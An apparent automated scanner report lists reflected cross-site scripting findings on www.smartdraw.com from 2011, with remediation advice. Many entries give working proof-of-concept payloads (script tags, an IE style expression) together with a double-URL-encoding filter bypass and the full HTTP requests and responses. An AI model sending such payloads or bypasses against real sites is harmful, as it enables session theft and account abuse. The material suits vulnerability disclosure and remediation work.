Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3 was submitted in the REST URL parameter 1. This input was echoed as 1d612"style="x:expression(alert(1))"0eedd2683a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /1d612%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220eedd2683a3/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:59 GMT Content-Length: 8711 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0rroqt55mx5ciq55y2wqysn5; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e was submitted in the REST URL parameter 1. This input was echoed as f0935"style="x:expression(alert(1))"182a262986e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buyf0935%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522182a262986e/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:55 GMT Content-Length: 8732 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: ASP.NET_SessionId=u5pklnekx3dx2wzgqqztpun5; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 was submitted in the REST URL parameter 2. This input was echoed as c1baf"style="x:expression(alert(1))"056ce7adff3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buy/x22c1baf%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522056ce7adff3 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:05 GMT Content-Length: 8732 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: ASP.NET_SessionId=dvui0v455qaojrfdct104guc; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 was submitted in the REST URL parameter 2. This input was echoed as 4fed4"style="x:expression(alert(1))"152282d3cc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /buy/4fed4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522152282d3cc2 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:10 GMT Content-Length: 8711 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=nmr5smvrazti5abqjnbbtv45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.5. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/buy/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b9c"style="x:expression(alert(1))"07d1f7b8086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /buy/x22?47b9c"style%3d"x%3aexpression(alert(1))"07d1f7b8086=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=sbcbwyb2aq3qzfu15i0dsh55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.6. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/buy/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61661"style%3d"x%3aexpression(alert(1))"aa36938865b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61661"style="x:expression(alert(1))"aa36938865b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /buy/x22?61661"style%3d"x%3aexpression(alert(1))"aa36938865b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=zuev0255yk14t1frw24v3j55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03 was submitted in the REST URL parameter 1. This input was echoed as 2a862"><script>alert(1)</script>8fd8df6ce03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /2a862%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8fd8df6ce03?id=340839/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:32 GMT; path=/ Set-Cookie: ASP.NET_SessionId=dc5mez55nymwryfaavsylt55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8844 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 was submitted in the REST URL parameter 1. This input was echoed as 6fd6e"style="x:expression(alert(1))"71fe023e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads6fd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252271fe023e54 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yyv5x0450piuis45ejmzuryy; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 was submitted in the REST URL parameter 1. This input was echoed as 75a12"style="x:expression(alert(1))"8ae5fca1f39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /75a12%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25228ae5fca1f39 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8683 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=jl33dq55fge2ij55usujg355; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c was submitted in the REST URL parameter 1. This input was echoed as 96d2c"><script>alert(1)</script>26549339e2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads96d2c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e26549339e2c?id=340839/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/ Set-Cookie: ASP.NET_SessionId=q4uupajw15d2f4bqiizdyum2; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8907 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7d"><script>alert(1)</script>1bd1fdf7711 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?id=340839/x22/x3eSmartDrawa1f7d"><script>alert(1)</script>1bd1fdf7711 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5facb"><script>alert(1)</script>49b68308620 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?id=5facb"><script>alert(1)</script>49b68308620 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.13. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8433d"><script>alert(1)</script>f5beed3ebcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?8433d"><script>alert(1)</script>f5beed3ebcb=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.14. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aec6"><script>alert(1)</script>133a985f46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads?9aec6"><script>alert(1)</script>133a985f46b=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049 was submitted in the REST URL parameter 1. This input was echoed as 7e0fd"style="x:expression(alert(1))"c7b5f3c9049 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: ASP.NET_SessionId=muhiv555hhwxlq45i4d30a2z; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87 was submitted in the REST URL parameter 1. This input was echoed as b2601"style="x:expression(alert(1))"cc75ed19a87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloadsb2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gjwvvma5ouzgwz45mccvo0yz; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db was submitted in the REST URL parameter 2. This input was echoed as ba1e3"style="x:expression(alert(1))"9c5fd0e07db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads/x22ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
